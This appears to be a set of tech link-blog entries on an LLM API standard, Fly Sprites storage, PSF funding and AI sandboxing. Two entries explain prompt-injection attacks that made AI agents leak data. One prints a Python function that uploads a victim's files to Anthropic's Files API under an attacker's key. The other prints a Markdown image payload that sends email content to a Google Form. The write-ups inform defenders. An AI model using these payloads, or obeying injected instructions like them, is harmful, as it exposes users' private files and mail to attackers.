| Open Responses |
https://www.openresponses.org/ |
This is the standardization effort I've most wanted in the world of LLMs: a vendor-neutral specification for the JSON API that clients can use to talk to hosted LLMs.
Open Responses aims to provide exactly that as a documented standard, derived from OpenAI's Responses API.
I was hoping for one based on their older Chat Completions API, since so many other products have cloned that already, but basing it on Responses does make sense: that API was designed with the features of more recent models - such as reasoning traces - baked into the design.
What's certainly notable is the list of launch partners. OpenRouter alone means we can expect to be able to use this protocol with almost every existing model, and Hugging Face, LM Studio, vLLM, Ollama and Vercel cover a huge portion of the common tools used to serve models.
For protocols like this I really want to see a comprehensive, language-independent conformance test site. Open Responses has a subset of that - the official repository includes [src/lib/compliance-tests.ts](https://github.com/openresponses/openresponses/blob/d0f23437b27845d5c3d0abaf5cb5c4a702f26b05/src/lib/compliance-tests.ts) which can be used to exercise a server implementation, and is available as a React app [on the official site](https://www.openresponses.org/compliance) that can be pointed at any implementation served via CORS.
What's missing is the equivalent for clients. I plan to spin up my own client library for this in Python, and I'd really like to be able to run that against a conformance suite designed to check that my client correctly handles all of the details.
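To make the shape of the protocol concrete, here's a minimal sketch of what a client request might look like. I'm assuming the spec keeps the basic contours of the OpenAI Responses API it derives from - a `POST /v1/responses` with `model` and `input` fields - but the spec itself is the authority on the exact details:

```python
# Minimal sketch of a Responses-style client call. Field names follow the
# OpenAI Responses API that Open Responses derives from; consult the spec
# for the authoritative request and response shapes.
import json
import urllib.request

def create_response(base_url: str, api_key: str, model: str, text: str) -> dict:
    """POST a single-turn request to a /v1/responses endpoint."""
    request = urllib.request.Request(
        f"{base_url}/v1/responses",
        data=json.dumps({"model": model, "input": text}).encode("utf-8"),
        headers={
            "Content-Type": "application/json",
            "Authorization": f"Bearer {api_key}",
        },
    )
    with urllib.request.urlopen(request) as response:
        return json.load(response)
```

The promise of a vendor-neutral standard is that those same few lines should work against OpenRouter, LM Studio, vLLM, Ollama or any other conforming server just by swapping out `base_url`. |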
2026-01-15 23:56:56+00:00 |
| The Design & Implementation of Sprites |
https://fly.io/blog/design-and-implementation/ |
I [wrote about Sprites last week](https://simonwillison.net/2026/Jan/9/sprites-dev/). Here's Thomas Ptacek from Fly with the insider details on how they work under the hood.
I like this framing of them as "disposable computers":
> Sprites are ball-point disposable computers. Whatever mark you mean to make, we’ve rigged it so you’re never more than a second or two away from having a Sprite to do it with.
I've noticed that new Fly Machines can take a while (up to around a minute) to provision. Sprites solve that by keeping warm pools of unused machines in multiple regions, made possible because every Sprite starts from the same container:
> Now, today, under the hood, Sprites are still Fly Machines. But they all run from a standard container. Every physical worker knows exactly what container the next Sprite is going to start with, so it’s easy for us to keep pools of “empty” Sprites standing by. The result: a Sprite create doesn’t have any heavy lifting to do; it’s basically just doing the stuff we do when we start a Fly Machine.
The most interesting detail is how the persistence layer works. Sprites only charge you for data you have written that differs from the base image, and provide ~300ms checkpoints and restores - it turns out that's powered by a custom filesystem on top of S3-compatible storage, coordinated by Litestream-replicated local SQLite metadata:
> We still exploit NVMe, but not as the root of storage. Instead, it’s a read-through cache for a blob on object storage. S3-compatible object stores are the most trustworthy storage technology we have. I can feel my blood pressure dropping just typing the words “Sprites are backed by object storage.” [...]
>
> The Sprite storage stack is organized around the JuiceFS model (in fact, we currently use a very hacked-up JuiceFS, with a rewritten SQLite metadata backend). It works by splitting storage into data (“chunks”) and metadata (a map of where the “chunks” are). Data chunks live on object stores; metadata lives in fast local storage. In our case, that metadata store is [kept durable with Litestream](https://litestream.io). Nothing depends on local storage.
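To make that chunks-plus-metadata split concrete, here's a deliberately toy Python sketch of the write and read paths - my illustration of the general JuiceFS model, not Fly's actual code, with an in-memory dict standing in for the object store:

```python
# Toy illustration of the JuiceFS-style split: data chunks on an object
# store, a chunk map in local SQLite (which Litestream would keep durable).
# This is NOT Fly's implementation - just the general shape of the model.
import hashlib
import sqlite3

CHUNK_SIZE = 4 * 1024 * 1024  # arbitrary illustrative chunk size (4 MiB)

object_store: dict[str, bytes] = {}  # stand-in for an S3-compatible bucket

db = sqlite3.connect("metadata.db")
db.execute("CREATE TABLE IF NOT EXISTS chunks (path TEXT, idx INTEGER, key TEXT)")

def write_file(path: str, data: bytes) -> None:
    """Split data into chunks, upload each, record the chunk map locally."""
    for offset in range(0, len(data), CHUNK_SIZE):
        chunk = data[offset:offset + CHUNK_SIZE]
        key = hashlib.sha256(chunk).hexdigest()  # content-addressing is my assumption
        object_store[key] = chunk  # in reality an S3 PUT, cached on local NVMe
        db.execute(
            "INSERT INTO chunks VALUES (?, ?, ?)",
            (path, offset // CHUNK_SIZE, key),
        )
    db.commit()

def read_file(path: str) -> bytes:
    """Reads consult the SQLite chunk map, then fetch chunks (via the NVMe cache)."""
    rows = db.execute("SELECT key FROM chunks WHERE path = ? ORDER BY idx", (path,))
    return b"".join(object_store[row[0]] for row in rows)
```

Local disk only ever holds a cache and a replicated metadata file, which is what makes near-instant checkpoint and restore plausible: the durable state is already sitting in object storage. |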
2026-01-15 16:08:27+00:00 |
| Claude Cowork Exfiltrates Files |
https://www.promptarmor.com/resources/claude-cowork-exfiltrates-files |
Claude Cowork defaults to allowing outbound HTTP traffic to only a specific list of domains, to help protect the user against prompt injection attacks that exfiltrate their data.
PromptArmor found a creative workaround: Anthropic's API domain is on that list, so they constructed an attack that includes an attacker's own Anthropic API key and has the agent upload any files it can see to the `https://api.anthropic.com/v1/files` endpoint, allowing the attacker to retrieve their content later.
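Here's a sketch of the shape of that channel - illustrative only, not PromptArmor's exact payload. The crucial detail is that the allowlisted domain accepts authenticated uploads, and the request carries whatever API key the injected instructions supply:

```python
# Illustrative sketch of the exfiltration channel - not PromptArmor's payload.
# The allowlist permits api.anthropic.com, and the Files API stores uploads
# under whichever account's API key the request presents: the attacker's.
import urllib.request

ATTACKER_API_KEY = "sk-ant-..."  # placeholder: an attacker-controlled key

def exfiltrate(filename: str, contents: bytes) -> None:
    boundary = "X" * 30
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode() + contents + f"\r\n--{boundary}--\r\n".encode()
    request = urllib.request.Request(
        "https://api.anthropic.com/v1/files",  # on the default domain allowlist
        data=body,
        headers={
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            # some API versions may also require an anthropic-beta header
            "Content-Type": f"multipart/form-data; boundary={boundary}",
        },
    )
    urllib.request.urlopen(request)  # the file now lives in the attacker's account
```

Domain allowlists assume the domain is the trust boundary; here the real boundary is the credential, which the attacker gets to choose. |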
2026-01-14 22:15:22+00:00 |
| Anthropic invests $1.5 million in the Python Software Foundation and open source security |
https://pyfound.blogspot.com/2025/12/anthropic-invests-in-python.html?m=1 |
This is outstanding news, especially given our decision to withdraw from that NSF grant application [back in October](https://simonwillison.net/2025/Oct/27/psf-withdrawn-proposal/).
> We are thrilled to announce that Anthropic has entered into a two-year partnership with the Python Software Foundation (PSF) to contribute a landmark total of $1.5 million to support the foundation’s work, with an emphasis on Python ecosystem security. This investment will enable the PSF to make crucial security advances to CPython and the Python Package Index (PyPI) benefiting all users, and it will also sustain the foundation’s core work supporting the Python language, ecosystem, and global community.
Note that while security is a focus, these funds will also support other aspects of the PSF's work:
> Anthropic’s support will also go towards the PSF’s core work, including the Developer in Residence program driving contributions to CPython, community support through grants and other programs, running core infrastructure such as PyPI, and more. |
2026-01-13 23:58:17+00:00 |
| Superhuman AI Exfiltrates Emails |
https://www.promptarmor.com/resources/superhuman-ai-exfiltrates-emails |
Classic prompt injection attack:
> When asked to summarize the user’s recent mail, a prompt injection in an untrusted email manipulated Superhuman AI to submit content from dozens of other sensitive emails (including financial, legal, and medical information) in the user’s inbox to an attacker’s Google Form.
To Superhuman's credit, they treated this as the high-priority incident it is and issued a fix.
The root cause was a CSP rule that allowed markdown images to be loaded from `docs.google.com` - it turns out Google Forms on that domain will persist data fed to them via a GET request!
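The delivery mechanism deserves spelling out. A Google Form's `formResponse` endpoint records submissions passed as URL query parameters, so the injected instructions only need the AI to render a Markdown image along these lines (the form ID and field number here are hypothetical):

```markdown
![loading](https://docs.google.com/forms/d/e/HYPOTHETICAL_FORM_ID/formResponse?entry.1000001=SUMMARIZED_SENSITIVE_EMAILS)
```

Rendering the summary fires the GET automatically - no click required - and Google Forms persists the query string as a form submission for the attacker to read later. |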
2026-01-12 22:24:54+00:00 |
| Don't fall into the anti-AI hype |
https://antirez.com/news/158 |
I'm glad someone was brave enough to say this. There is a *lot* of anti-AI sentiment in the software development community these days. Much of it is justified, but if you let people convince you that AI isn't genuinely useful for software developers, or that this whole thing will blow over soon, you're taking on a very real risk to your future career.
As Salvatore Sanfilippo puts it:
> It does not matter if AI companies will not be able to get their money back and the stock market will crash. All that is irrelevant, in the long run. It does not matter if this or the other CEO of some unicorn is telling you something that is off putting, or absurd. Programming changed forever, anyway.
I do like this hopeful, positive outlook on what this could all mean, emphasis mine:
> How do I feel, about all the code I wrote that was ingested by LLMs? I feel great to be part of that, because I see this as a continuation of what I tried to do all my life: democratizing code, systems, knowledge. **LLMs are going to help us to write better software, faster, and will allow small teams to have a chance to compete with bigger companies**. The same thing open source software did in the 90s.
This post has been the subject of heated discussions all day today on both [Hacker News](https://news.ycombinator.com/item?id=46574276) and [Lobste.rs](https://lobste.rs/s/cmsfbu/don_t_fall_into_anti_ai_hype). |
2026-01-11 23:58:43+00:00 |
| TIL from taking Neon I at the Crucible |
https://til.simonwillison.net/neon/neon-1 |
Things I learned about making neon signs after a week-long intensive evening class at [the Crucible](https://www.thecrucible.org/) in Oakland. |
2026-01-11 17:35:57+00:00 |
| A Software Library with No Code |
https://www.dbreunig.com/2026/01/08/a-software-library-with-no-code.html |
Provocative experiment from Drew Breunig, who designed a new library for time formatting ("3 hours ago" kind of thing) called "whenwords" that has no code at all, just a carefully written specification, an AGENTS.md and a collection of conformance tests in a YAML file.
Pass that to your coding agent of choice, tell it what language you need and it will write it for you on demand!
This meshes neatly with my recent [interest in conformance suites](https://simonwillison.net/2025/Dec/31/the-year-in-llms/#the-year-of-conformance-suites). If you publish good enough language-independent tests it's pretty astonishing how far today's coding agents can take you!
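For a sense of what language-independent tests buy you, here's the general shape such a YAML suite could take - a hypothetical sketch, not Drew's actual file:

```yaml
# Hypothetical conformance-test shape - whenwords' real file may differ.
# Each case pins an input duration in seconds to an exact output string,
# so a generated implementation in any language can be checked against it.
- input_seconds: 45
  expected: "45 seconds ago"
- input_seconds: 10800
  expected: "3 hours ago"
- input_seconds: 172800
  expected: "2 days ago"
```

Given enough cases like these, the spec plus tests pin behavior down tightly enough that "correct" stops depending on which agent or language produced the code. |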
2026-01-10 23:41:58+00:00 |
| How Google Got Its Groove Back and Edged Ahead of OpenAI |
https://www.wsj.com/tech/ai/google-ai-openai-gemini-chatgpt-b766e160 |
I picked up a few interesting tidbits from this Wall Street Journal piece on Google's recent hard-won success with Gemini.
Here's the origin of the name "Nano Banana":
> Naina Raisinghani, known inside Google for working late into the night, needed a name for the new tool to complete the upload. It was 2:30 a.m., though, and nobody was around. So she just made one up, a mashup of two nicknames friends had given her: Nano Banana.
The WSJ credits OpenAI's Daniel Selsam with un-retiring Sergey Brin:
> Around that time, Google co-founder Sergey Brin, who had recently retired, was at a party chatting with a researcher from OpenAI named Daniel Selsam, according to people familiar with the conversation. Why, Selsam asked him, wasn’t he working full time on AI. Hadn’t the launch of ChatGPT captured his imagination as a computer scientist?
>
> ChatGPT was on its way to becoming a household name in AI chatbots, while Google was still fumbling to get its product off the ground. Brin decided Selsam had a point and returned to work.
And we get some rare concrete user numbers:
> By October, Gemini had more than 650 million monthly users, up from 450 million in July.
The LLM usage number I see cited most often is OpenAI's 800 million weekly active users for ChatGPT. That's from October 6th at OpenAI DevDay, so it covers the same period as these Gemini numbers - though it's not directly comparable, since it counts weekly rather than monthly actives.
I'm also never sure what counts as a "Gemini user" - does interacting via Google Docs or Gmail count or do you need to be using a Gemini chat interface directly? |
2026-01-08 15:32:08+00:00 |
| A field guide to sandboxes for AI |
https://www.luiscardoso.dev/blog/sandboxes-for-ai |
This guide to the current sandboxing landscape by Luis Cardoso is comprehensive, dense and absolutely fantastic.
He starts by differentiating between containers (which share the host kernel), microVMs (which run their own guest kernel behind hardware virtualization), gVisor-style userspace kernels, and WebAssembly/isolates that constrain everything within a runtime.
The piece then dives deep into terminology, approaches and the landscape of existing tools.
I think using the right sandboxes to safely run untrusted code is one of the most important problems to solve in 2026. This guide is an invaluable starting point. |
2026-01-06 22:38:00+00:00 |